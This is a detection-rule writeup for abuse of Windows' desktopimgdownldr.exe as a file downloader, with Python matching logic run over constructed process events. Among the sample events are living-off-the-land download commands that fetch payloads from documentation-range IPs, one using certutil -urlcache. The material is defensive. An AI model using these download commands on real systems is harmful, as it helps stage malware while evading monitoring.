
Summary
This detection rule targets execution of the desktopimgdownldr.exe utility on Windows systems, a built-in binary intended to fetch a lock-screen image that attackers repurpose to download arbitrary files from remote locations. The rule fires when the desktopimgdownldr executable is run with a command line containing '/lockscreenurl:http', which shows the tool being pointed at a remote URL and indicates a potential download attempt. Because this utility is less widely monitored than better-known download tools such as certutil, adversaries can use it to slip past controls, so security teams should watch its execution closely. The rule evaluates process creation logs and alerts on these specific invocations, contributing to the detection of command-and-control activity that involves file downloads. It carries a medium severity: a match can indicate a significant incident, but false positives are possible, so each alert needs additional investigation.
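The rule's matching logic as it would run over process-creation telemetry, written here as an added example in Python rather than taken from the rule's published source. The event records are constructed Sysmon-style fields (Image, CommandLine, ParentImage) with addresses from the RFC 5737 documentation ranges, and the image-extension triage hint is an assumption layered on top of the rule, not part of it.

```python
"""Process-creation detection for desktopimgdownldr.exe downloads.

Added example, not the rule's own source. Event shape (Image, CommandLine,
ParentImage) mirrors Sysmon Event ID 1 fields; every event below is constructed.
"""
import re
from dataclasses import dataclass
from typing import Dict, Iterable, List, Optional

# Rule logic from the summary: the binary is desktopimgdownldr and its command
# line contains '/lockscreenurl:http'. Windows command lines are not
# case-sensitive, so both checks ignore case.
TARGET_IMAGE = "desktopimgdownldr.exe"
URL_ARG = re.compile(r"/lockscreenurl:(\S+)", re.IGNORECASE)

# Triage hint (assumption, not part of the rule): a genuine lock-screen image
# URL should end in an image extension; anything else deserves a closer look.
IMAGE_EXTENSIONS = (".jpg", ".jpeg", ".png", ".bmp", ".gif")


@dataclass(frozen=True)
class Alert:
    image: str
    command_line: str
    parent_image: str
    url: str
    url_looks_like_image: bool


def image_basename(image: str) -> str:
    """Lower-cased file name of an image path, tolerating \\ and / separators.

    Matching on the basename rather than the full System32 path also catches a
    copy of the binary executed from another directory.
    """
    return re.split(r"[\\/]", image)[-1].lower()


def lockscreen_url(command_line: str) -> Optional[str]:
    """Return the value passed to /lockscreenurl:, or None if it is absent."""
    m = URL_ARG.search(command_line)
    return m.group(1) if m else None


def matches_rule(event: Dict[str, str]) -> bool:
    """True when the event satisfies the rule described above."""
    if image_basename(event.get("Image", "")) != TARGET_IMAGE:
        return False
    url = lockscreen_url(event.get("CommandLine", ""))
    return url is not None and url.lower().startswith("http")


def run_detection(events: Iterable[Dict[str, str]]) -> List[Alert]:
    """Evaluate the rule over process-creation events and return the matches."""
    alerts: List[Alert] = []
    for ev in events:
        if not matches_rule(ev):
            continue
        url = lockscreen_url(ev["CommandLine"]) or ""
        alerts.append(Alert(
            image=ev.get("Image", ""),
            command_line=ev["CommandLine"],
            parent_image=ev.get("ParentImage", ""),
            url=url,
            url_looks_like_image=url.lower().split("?")[0].endswith(IMAGE_EXTENSIONS),
        ))
    return alerts


# Constructed sample events: two hits, one renamed-path hit, two non-matches.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"Image": r"C:\Windows\System32\desktopimgdownldr.exe",
     "CommandLine": "desktopimgdownldr.exe /lockscreenurl:https://198.51.100.7:8080/stage2.bin /eventName:desktopimgdownldr",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"Image": r"C:\Windows\System32\desktopimgdownldr.exe",
     "CommandLine": r'"C:\Windows\System32\desktopimgdownldr.exe" /LockScreenUrl:HTTP://192.0.2.25/wallpaper.png /eventName:desktopimgdownldr',
     "ParentImage": r"C:\Windows\explorer.exe"},
    {"Image": r"C:\Windows\System32\desktopimgdownldr.exe",
     "CommandLine": "desktopimgdownldr.exe /lockscreenurl:file:///C:/Users/Public/bg.jpg",
     "ParentImage": r"C:\Windows\explorer.exe"},
    {"Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": "certutil -urlcache -split -f http://198.51.100.7/x.bin x.bin",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"Image": r"C:\Users\Public\desktopimgdownldr.exe",
     "CommandLine": "desktopimgdownldr.exe /lockscreenurl:http://198.51.100.7/a.txt",
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"},
]


if __name__ == "__main__":
    for alert in run_detection(SAMPLE_EVENTS):
        hint = "image URL" if alert.url_looks_like_image else "NON-IMAGE URL"
        print(f"[{hint}] parent={alert.parent_image} url={alert.url}")
```

Only the basename and '/lockscreenurl:http' checks implement the rule as summarised; the parent image and the image-extension flag are carried on the alert purely to speed up the investigation the medium severity calls for, since a lock-screen image request that fetches a .bin or .txt from a raw IP is the case worth escalating first.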
Categories
- Endpoint
- Windows
Data Sources
- Process
Created: 2022-09-27